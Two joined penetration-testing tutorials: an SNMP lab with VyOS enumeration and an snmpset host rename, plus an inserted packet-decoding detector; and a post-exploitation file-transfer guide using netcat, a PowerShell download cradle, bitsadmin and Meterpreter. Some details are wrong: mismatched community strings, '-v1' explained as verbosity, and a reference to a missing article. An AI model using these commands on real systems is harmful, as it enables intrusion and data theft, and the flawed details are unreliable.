After completing the initial setup in VMware, boot the newly created virtual machine by clicking on Power on this virtual machine.

The Default Login Credentials for Vyos are

Username: vyos

Password: vyos

The Initial Boot of Vyos will be as shown below:

This is a live boot of VyOS, so we will install VyOS to use it properly.

We will use the ISO image to install VyOS. Type the following command:

Command: install image

Enter “Yes” where it asks to continue.

Next it will ask about the partition management.

Enter “Auto” where it asks about Partition.

It will detect the drives in the virtual system and ask you to select the particular drive on which you want to install VyOS.

Enter “sda” where it asks about the location for installation.

Next it will ask about the size for the root partition for the vyos.

You can enter any size from 1000MB to 21474MB, but it is recommended to keep it at the maximum, i.e. 21474MB.

Next it will ask about the name for the image.

By default the name is set to the version number, that is 1.1.8. You can either give a personalised name or leave it at the default.

Next it will ask about the location to copy the sda.

It is recommended to keep it default.

After that it will ask for the password to be kept for the administrator account.

By default it is vyos, but from a security point of view it is recommended to change it to something complex which is difficult to guess or brute force.

Now it will ask for the drive on which you want to set up the GRUB boot loader. Again leave it at the default, "sda".

After that we have completed the vyos setup. Reboot using the command

Command: reboot

After reboot it will ask for login credentials; enter the credentials that you entered during the installation.

Now we will configure the network interface. To do that, we will have to enter configuration mode.

Command: configure

After entering configuration mode, set up the network interface:

Syntax: set interfaces ethernet [network interface] address [Static IPv4 Address]

Command: set interfaces ethernet eth0 address 192.168.1.125/24

Now commit and save the configuration.

Command: commit

Command: save

After that type "exit" to get out of configuration mode and then reboot the machine using the "reboot" command.

We are rebooting because the configuration changes come into effect only after a reboot.

You can view the interface which we configured by using the command

Command: show interfaces

Note: The above command will run in configuration mode.

Start SNMP service

Now we will set up the snmp service in the Vyos.

For that we will enter configuration mode using command

Command: configure

Now to set up an SNMP service we will need to add a community string and give it an authorization. To do that:

Syntax: set service snmp community [community-string] authorization [auth-mode]

[community-string]: It can be anything, but normally it is either public or private. From a security point of view it is recommended to use one that cannot be easily guessed or brute-forced.

[auth-mode]: It is the authorization mode. We have two options:

  1. [ro]: Read Only authorization (it can only be used to read or extract data; we cannot change it using this string)
  2. [rw]: Read Write authorization (it can be used to change the data using the string)

Command: set service snmp community ignite123 authorization ro

Command: set service snmp community ignite123 authorization rw

Now let's set a user for the system.

Firstly, enter configuration mode.

Command: configure

Now to add a user we will use the following command:

Syntax: set system login user [username] authentication plaintext-password [password]

Command: set system login user ignite authentication plaintext-password ignite123

After this, commit the configuration and save it. Also reboot the machine so that the changes take effect.

We have successfully completed the SNMP lab in VyOS.

SNMP Enumeration using Kali Linux

Now that we have set up an SNMP service, let's pentest it through Kali Linux's built-in tools one by one. We can read and extract information using the community string that has read-only authorization, but to change the information we will have to use the community string with read-write authorization.

Nmap

Let's check using Nmap on a Kali Linux machine which is running on the same network.

nmap -sU -p161,162 192.168.1.125

[-sU]: UDP ports, as the SNMP service runs over UDP

[-p]: Specify port number; the SNMP service runs on ports 161 and 162

From the image below you can observe that it has shown that port 161 is open.

Snmpwalk

snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.

Command: snmpwalk -v1 -c ignite321 192.168.1.125

Here

[-v1]: Level of verbose mode

[-c]: Community String

From the image below you can observe all the details that are returned as "STRING".

Snmpset

We can manipulate these details using the ISO id with another tool, snmpset. Here we are renaming the host string from vyos to Hacked.

Command: snmpset -v1 -c ignite321 192.168.1.125 iso.3.6.1.2.1.1.5.0 s Hacked

Let's check whether the changes we implemented had an effect, using snmpwalk.

Command: snmpwalk -v1 -c ignite321 192.168.1.125

As you can see, we have successfully changed the host name from vyos to Hacked.

We can extract a lot of information using snmpwalk.

Command: snmpwalk -v1 -c ignite321 192.168.1.125 1.3.6.1.2.1.25.4.2.1.2

Command: snmpwalk -v1 -c ignite321 192.168.1.125 1.3.6.1.2.1.6.13.1.3

Command: snmpwalk -v1 -c ignite321 192.168.1.125 1.3.6.1.2.1.25.6.3.1.2

As the data extracted by snmpwalk is quite large, we can write it into a text file by using the command below.

Command: snmpwalk -v1 -c ignite321 192.168.1.125 > snmpout.txt

We can use gedit to view the extracted information.

Command: gedit snmpout.txt

SNMP-Check

Like snmpwalk, snmp-check allows you to enumerate SNMP devices and presents the output in a very human-readable format. It could be useful for penetration testing or systems monitoring.

Command: snmp-check 192.168.1.125 -p 161 -c ignite123

Here,

[-p]: To specify port

[-c]: To specify Community String

Braa

Braa is a mass SNMP scanner. The intended usage of such a tool is of course making SNMP queries, but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN SNMP stack, so it does NOT need any SNMP libraries like net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

Command: braa ignite123@192.168.1.125:.1.3.6.*

Metasploit

We can enumerate SNMP using a Metasploit module called snmp_enum.

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.1.125

msf auxiliary(scanner/snmp/snmp_enum) > set community ignite123

msf auxiliary(scanner/snmp/snmp_enum) > run

We have fetched the same result from Metasploit as above.
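To see what the community string in the commands above (and in the community-guessing tools from the SNMP password article earlier on this page) looks like on the wire, here is an added example that is not part of the original article: a minimal SNMPv1 encoder/decoder that builds the snmpset on sysName, parses datagrams, and flags SetRequests, default communities and a source cycling through many community strings. The BER code is hand-rolled here (no pysnmp); the traffic is constructed from the page's community, host and OID.

```python
"""Decode SNMPv1 datagrams to see what the community string and the snmpset above look like
on the wire, and flag the traffic a defender should care about.
Added example, not from the original article. It hand-rolls the BER subset SNMPv1 needs
(no pysnmp); the datagrams are constructed from the page's community, host and sysName OID."""
from collections import defaultdict

PDU = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
DEFAULT_COMMUNITIES = {"public", "private"}
SYS_NAME = "1.3.6.1.2.1.1.5.0"  # iso.3.6.1.2.1.1.5.0, the OID the snmpset above rewrites


def tlv(tag, body):
    """BER tag-length-value; long-form length once the body reaches 128 bytes."""
    if len(body) < 128:
        return bytes([tag, len(body)]) + body
    n = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(n)]) + n + body

def enc_int(v):
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def enc_oid(oid):
    parts = [int(x) for x in oid.strip(".").split(".")]
    out = [40 * parts[0] + parts[1]]
    for p in parts[2:]:  # base-128 digits, high bit set on all but the last
        chunk = [p & 0x7F]
        while p > 0x7F:
            p >>= 7
            chunk.append(0x80 | (p & 0x7F))
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def snmp_v1(community, pdu_tag, oid, set_value=None, request_id=1):
    """SNMPv1 message with one varbind: NULL for a Get, OCTET STRING for a Set."""
    value = tlv(0x05, b"") if set_value is None else tlv(0x04, set_value.encode())
    varbinds = tlv(0x30, tlv(0x30, enc_oid(oid) + value))
    pdu = tlv(pdu_tag, enc_int(request_id) + enc_int(0) + enc_int(0) + varbinds)
    return tlv(0x30, enc_int(0) + tlv(0x04, community.encode()) + pdu)  # version 0 == v1

def read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def dec_oid(body):
    parts, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))

def parse_snmp(datagram):
    """Version, community (sent in cleartext in every packet), PDU type and OIDs touched."""
    _, msg, _ = read_tlv(datagram)
    _, ver, p = read_tlv(msg)
    _, community, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    p = 0
    for _ in range(3):  # skip request-id, error-status, error-index
        _, _, p = read_tlv(pdu, p)
    _, varbinds, _ = read_tlv(pdu, p)
    oids, p = [], 0
    while p < len(varbinds):
        _, vb, p = read_tlv(varbinds, p)
        _, oid_body, _ = read_tlv(vb)
        oids.append(dec_oid(oid_body))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": community.decode("ascii", "replace"),
            "pdu": PDU.get(pdu_tag, hex(pdu_tag)), "oids": oids}

def review(datagrams, guess_threshold=3):
    """(src_ip, payload) pairs -> findings: SetRequests, default communities, and a source
    cycling through many community strings (the pattern the brute-force tools above leave)."""
    findings, tried = [], defaultdict(set)
    for src, payload in datagrams:
        m = parse_snmp(payload)
        tried[src].add(m["community"])
        if m["pdu"] == "SetRequest":
            findings.append((src, "set_request", m["oids"][0]))
        if m["community"] in DEFAULT_COMMUNITIES:
            findings.append((src, "default_community", m["community"]))
    for src, comms in tried.items():
        if len(comms) >= guess_threshold:
            findings.append((src, "community_guessing", len(comms)))
    return findings

# Constructed traffic: the article's snmpset, then a community-guessing burst from the same host.
TRAFFIC = [("192.168.1.126", snmp_v1("ignite123", 0xA3, SYS_NAME, "Hacked"))] + [
    ("192.168.1.126", snmp_v1(c, 0xA0, "1.3.6.1.2.1.1.1.0")) for c in ("public", "private", "ignite")]

if __name__ == "__main__":
    for finding in review(TRAFFIC):
        print(finding)
```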

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post SNMP Lab Setup and Penetration Testing appeared first on Hacking Articles.

Comprehensive Guide to File Transfer (Post Exploitation)


In penetration testing, we generally get stuck when we need to transfer or download a file from a compromised machine or another host in the network. Therefore today you will learn which methods you can follow for downloading a file from a compromised or other host system. All of the following methods are helpful in penetration testing and are also used for general purposes.

Let's start!!

File transfer Protocol (FTP)

You are all familiar with the working of an FTP server, so let's start today's tutorial with the FTP service.

When you find port 21 open, it means the FTP service is running on the remote machine; if you are looking to download a text file from the destination machine then you can follow the 2 methods below.

1st method use command-line

First connect to ftp server using host IP, enter login credential and then execute get command with file name you want to download.

ftp 192.168.1.106

get raj.txt

2nd method use Browser

The same job can be done using a browser by entering the host IP in the URL as ftp://192.168.1.106; enter the username and password for authentication and download your file.

Install Python FTP server

Generally many people prefer the vsftpd server for the FTP service to share files over port 21, as done above, but if you are not comfortable with vsftpd then you can go with the 2nd option, the Python FTP server, which also allows sharing of files through port 21.

sudo apt-get install python-pyftpdlib

Here I want to give access to only a particular folder, "aarti", for sharing its data.

sudo python -m pyftpdlib -p 21

So when the host machine enters the destination address in the URL, "ftp://192.168.1.103", you will get anonymous login; now download the file.

Hypertext Transfer Protocol (HTTP)

Sharing file through web directory “html”

Another well-known service for file transfer is the HTTP service, which uses port 80. The Apache service should be running on your machine for transferring files through web directories, and then you can move any file into the html directory to share it through the HTTP service.

So here we are transferring the putty.exe file into html with the following command.

cp putty.exe /var/www/html

Now let's download putty.exe to our machine from the destination server. Open your favourite browser and browse to the file through the server address 192.168.1.106/putty.exe in the URL. By applying this technique you can access any file inside the web directory, i.e. /var/www/html, of the destination machine.

Sharing through Python Http server

If you are not comfortable with the above HTTP method then you can choose the 2nd option, "SimpleHTTPServer", which is also a Python module; it uses port 80 here for sharing files in a network through a web browser.

Here again I want to give access to only a particular folder, "demo", for sharing its data.

python -m SimpleHTTPServer 80

So when the host machine enters the destination address in the URL, "http://192.168.1.108", you will get access to the shared folder; now download the file.

HFS Tool

In the above HTTP file sharing methods we used Ubuntu and Linux for transferring a file over port 80 and allowed other host machines to download it through a web browser.

Now if you are a Windows user then you can use the HFS tool for performing the same job. It is a very popular tool for file transfer between different platforms.

Steps:

  • Download HFS and run the application
  • Now drag and drop the file you want to share through the web browser.

Now when a user on another host machine opens the Windows IP as the URL http://192.168.1.105 in his web browser, he can download the shared file.

Netcat

Netcat is known as the Swiss army knife because it is used for multiple purposes;, therefore we are going to use it for file transfer.

Use the following command on the receiving machine to listen for the shared file from the destination server

Syntax: nc [options] [listening port] > [path to store downloaded file]

nc -lvp 5555 > /root/Desktop/raj.txt

Type the following command for sharing any file to the host machine in the network.

Syntax: nc [host IP] [host port] < file.txt

nc 192.168.1.108 5555 < raj.txt

Now you can observe that we have successfully downloaded the raj.txt file to the desktop of our host machine.

Curl

curl is a command-line tool for transferring data using various protocols. It is also used for downloading data from any website or host machine; the following command will download the putty.exe file from the web server.

curl -O http://192.168.1.106/putty.exe

Similarly, execute the command below for downloading PuTTY from the WWW.

curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

Wget

Execute the command below for downloading a particular file. The downloaded file is stored in the current directory. It gives an indication of download progress, size, date and time while downloading the file.

Enter the command below for downloading any file from the html directory of the Apache server.

wget http://192.168.1.106/putty.exe

Similarly, execute the command below for downloading PuTTY from the WWW.

wget https://the.earth.li/~sgtatham/putty/latest/putty.exe

 

Trivial File Transfer Protocol (TFTP)

The TFTP service is used to read and write any file using a remote connection; it uses UDP port 69 for sharing files and does not use authentication, hence it is less secure than FTP.

Here I have created a demo.txt file inside the tftp folder for sharing.

Metasploit contains a module that provides a TFTP service for file sharing.

use auxiliary/server/tftp

msf auxiliary(server/tftp) > set srvhost 192.168.1.108

msf auxiliary(server/tftp) > set TFTPROOT /root/tftp

msf auxiliary(server/tftp) > exploit

Now open a command prompt and execute the command below for downloading the demo.txt file to your system.

Syntax: tftp -i [host IP] GET [file name.txt]

tftp -i 192.168.1.108 GET demo.txt

As you can observe from the image below, it has stored the download in the current directory.

SMB Server using Python script

Now we will use a Python script that activates an SMB service on our Linux machine. You can visit GitHub for this Python script.

I copied the Python code from GitHub and pasted it into a text file as smbserver.py in the Desktop folder. Now execute the command below for a shared folder "raj".

python smbserver.py raj /root/share

Downloading file from Linux SMB server in Windows Machine

Since we are aware of the SMB service which is running on the host machine 192.168.1.108, and being on the Windows platform, we can access its shared folder through the Run prompt.

Hence you can observe that we have successfully accessed the folder "raj" and found two text files, user and pass, in it.

In this way we can use the SMB Python script for sharing files between Windows and Linux machines.

Downloading file from Linux SMB server in Ubuntu Machine

If you are an Ubuntu user, you can use the smbclient package to access the shared folder of the SMB server.

apt-get install smbclient

Now execute the command below to list the shares offered by the server.

smbclient -L 192.168.1.108

From the image below you can observe that the shared folder is listed as “RAJ”.

Now execute the command below to connect to the share raj and download the data inside it.

smbclient //192.168.1.108/raj

The folder raj contains two text files, user.txt and pass.txt; we download user.txt with the following command at the smb: \> prompt.

get user.txt
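Typing get into the interactive smb: \> prompt works for one file, but post-exploitation transfers are easier to repeat when scripted. The helpers below are an added example, not part of the original article: they use smbclient's -c option to run share commands non-interactively, -N for an anonymous connection (what a no-auth server such as the script above accepts), and the prompt OFF / recurse ON / mget * sequence to pull a whole share in one go. The host, share and file names in the usage comment are the article's.

```shell
#!/bin/sh
# Added example (not from the original article): non-interactive smbclient
# transfers. Host, share and file names are taken from the article's setup.

# List the shares a server offers, without sending credentials (-N).
list_shares() {
    smbclient -L "$1" -N
}

# Fetch a single file from a share. With no username the connection is
# anonymous (-N); pass a username as the fourth argument to be prompted
# for a password against an authenticated share instead.
smb_get() {
    host=$1; share=$2; file=$3; user=${4:-}
    command -v smbclient >/dev/null 2>&1 || { echo "smbclient is not installed" >&2; return 1; }
    if [ -n "$user" ]; then
        smbclient "//$host/$share" -U "$user" -c "get $file"
    else
        smbclient "//$host/$share" -N -c "get $file"
    fi
}

# Fetch every file in the share, recursing into subdirectories and
# suppressing the per-file confirmation that mget asks for by default.
smb_get_all() {
    host=$1; share=$2
    command -v smbclient >/dev/null 2>&1 || { echo "smbclient is not installed" >&2; return 1; }
    smbclient "//$host/$share" -N -c "prompt OFF; recurse ON; mget *"
}

# Usage, matching the article's setup:
#   list_shares 192.168.1.108
#   smb_get 192.168.1.108 raj user.txt
#   smb_get_all 192.168.1.108 raj
```

Files land in the current working directory, so cd to where you want them before calling the helpers; smbclient returns a non-zero exit status when the connection or the get fails, which makes the functions safe to chain with && in a larger script.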

Download file through Meterpreter

In a penetration test, once we have compromised the target machine and obtained a Meterpreter session with Metasploit, we can execute the following command inside Meterpreter to download any file from the victim’s machine to a local path.

meterpreter > download raj.txt /root/Desktop

Use Cat command

cat is a simple command that does a remarkable job if used wisely. Suppose you find a text file on the host machine and are unable to download it: open the file with cat instead.

For example, to read the text inside user.txt I execute the following command, then copy the output into a new text document and save it on our machine.

cat user.txt

Download file using Window PowerShell

If you are a Windows user with command shell access, you can use PowerShell to download a file from a web server. Execute the commands below in a command prompt opened as administrator.

powershell

(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.106/putty.exe','d:\data\putty.exe')

From the image below you can observe that putty.exe was downloaded to the d: drive.

Download file using BITSAdmin

BITSAdmin is a command-line utility on the Windows platform that lets a user download and upload files through the Background Intelligent Transfer Service. To download a file over HTTP, use the command below. As with the PowerShell example, run cmd as administrator and execute the command to download PuTTY. Note that Microsoft documents bitsadmin as deprecated in favour of the BITS PowerShell cmdlets, but it is still present on current Windows versions.

bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe F:\putty.exe

It then starts the download and prints updates while transferring, such as the job type (download), priority and status.

From the image below you can observe that putty.exe was downloaded to the f: drive.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

The post Compressive Guide to File Transfer (Post Exploitation) appeared first on Hacking Articles.
